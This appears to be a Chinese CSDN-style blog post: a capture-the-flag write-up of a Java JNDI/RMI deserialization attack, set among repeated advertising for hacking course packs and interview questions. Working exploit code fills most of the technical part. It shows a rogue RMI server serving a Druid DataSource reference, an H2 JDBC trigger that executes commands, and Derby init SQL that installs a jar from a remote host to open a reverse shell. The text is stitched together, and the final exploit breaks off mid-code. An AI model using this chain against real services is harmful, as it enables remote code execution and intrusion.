给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
网络安全源码合集+工具包
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
try{
Registry registry = LocateRegistry.createRegistry(8883);
Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
String JDBC\_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
"INFORMATION\_SCHEMA.TABLES AS $$//javascript\n" +
"java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')\n" +
"$$\n";
String JDBC\_USER = "root";
String JDBC\_PASSWORD = "password";
ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
ref.add(new StringRefAddr("url",JDBC\_URL));
ref.add(new StringRefAddr("username",JDBC\_USER));
ref.add(new StringRefAddr("password",JDBC\_PASSWORD));
ref.add(new StringRefAddr("initialSize","1"));
ref.add(new StringRefAddr("init","true"));
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
Naming.bind("rmi://localhost:8883/zlgExploit",referenceWrapper);
}
catch(Exception e){
e.printStackTrace();
}
它上面所用的是h2数据库,用的h2的alias来实现的Java代码执行,derby是不行的,在第二篇的derby RCE是要操作数据库,所以我们得换jdbc并且要找到一种方法在数据库连接后反序列化执行sql语句,又因为我们是靶场docker实现的,所以derby大概率不会使用网络模式而会使用内嵌模式直接连接,所以我们无需考虑数据库账号密码问题
找到jdbc
尝试在jadx中搜索对应的驱动方法名,因为pom导入的包在 org.apache.derby,中所以重点看这个路径下的字类,并且一般驱动以Driver结尾
所以driverClassName为:org.apache.derby.jdbc.EmbeddedDriver
找到连接的数据库
chatgpt问出来他的默认存在数据库应该是sample;但是我们可以在连接的时候加上’;create=true’来表示如果这个数据库不存在,则创建;
连接成功
报了个错误,是因为testWhileIdle设置的true,需要一个查询语句来查询,加了validationQuery会引发错误
又受到这篇文章的误导
设置为select 1还是引发报错,这里弄了非常久的时间一度考虑是否是数据库需要密码的情况,最后在另外一篇帖子发现应该使用SELECT 1 FROM SYSIBM.SYSDUMMY1 ;;;▄█▀█●
好,新增一行键值对:
ref.add(new StringRefAddr("validationQuery","SELECT 1 FROM SYSIBM.SYSDUMMY1"));
打derby实现RCE
根据第二篇信息收集给出的exp:
exp.java -> jar
import java.io.IOException;
public class testShell4 {
public static void exec() throws IOException {
Runtime.getRuntime().exec("cmd.exe /c calc");
}
}
sql:
## 导入一个类到数据库中
CALL SQLJ.INSTALL_JAR('http://127.0.0.1:8088/test3.jar', 'APP.Sample4', 0)
## 将这个类加入到derby.database.classpath,这个属性是动态的,不需要重启数据库
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','APP.Sample4')
## 创建一个PROCEDURE,EXTERNAL NAME 后面的值可以调用类的static类型方法
CREATE PROCEDURE SALES.TOTAL_REVENUES() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'testShell4.exec'
## 调用PROCEDURE
CALL SALES.TOTAL_REVENUES()
利用initConnectionSql执行sql
这里执行sql就很麻烦,所以结合第一篇文章找一下有没有可以利用的:
在com.alibaba.druid.pool.DruidDataSourceFactory中实现了ObjectFactory类
在其中找到了很多定义的字符串常量,里面都是可以被我们所利用的
第一段代码我们的代码相调用的对应,第二段就是将reference依次解析成响应的键值对
在里面找到到了这个initConnectionSqls,推测是连接后所执行的sql语句,注意后面带个s,那么是不是可以执行多条sql呢?接下来往下找
我们发现在这里对这个字符串进行了处理,把他按引号进行分割,在使用集合转换为list
有了这个思路就很清晰,直接结合第二篇的exp构造:
ref.add(new StringRefAddr("initConnectionSqls","CALL SQLJ.INSTALL\_JAR('http://XXX.XXX.XXX.XXX:8000/exp.jar', 'APP.Sample2', 0);CALL SYSCS\_UTIL.SYSCS\_SET\_DATABASE\_PROPERTY('derby.database.classpath','APP.Sample2');CREATE PROCEDURE SALES.TOTAL\_Exp2() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'com.example.testShell4.exec';CALL SALES.TOTAL\_Exp2();"));
并且根据第二篇exp把使用base64编码的反弹shell构造jar包
并放到VPS对应的上,使用python创建一个简单的服务
并且我需要将我伪装的rmi服务器也放到公网上面,这里为了方便,用花生壳来映射rmi端口:
反弹成功读取flag:
exp:
rmi服务器Exp:
try{
Registry registry = LocateRegistry.createRegistry(8883);
Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
String JDBC\_URL = "jdbc:derby:sample;create=true";
ref.add(new StringRefAddr("driverClassName","org.apache.derby.jdbc.EmbeddedDriver"));
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)
![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)
![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)
#### 2️⃣视频配套工具&国内外网安书籍、文档
##### ① 工具
![](https://img-blog.csdnimg.cn/img_convert/d3f08d9a26927e48b1332a38401b3369.png#pic_center)
##### ② 视频
![image1](https://img-blog.csdnimg.cn/img_convert/f18acc028dc224b7ace77f2e260ba222.png#pic_center)
##### ③ 书籍
![image2](https://img-blog.csdnimg.cn/img_convert/769b7e13b39771b3a6e4397753dab12e.png#pic_center)
资源较为敏感,未展示全面,需要的最下面获取
![在这里插入图片描述](https://img-blog.csdnimg.cn/e4f9ac066e8c485f8407a99619f9c5b5.png#pic_center)![在这里插入图片描述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)
##### ② 简历模板
![在这里插入图片描述](https://img-blog.csdnimg.cn/504b8be96bfa4dfb8befc2af49aabfa2.png#pic_center)
**因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**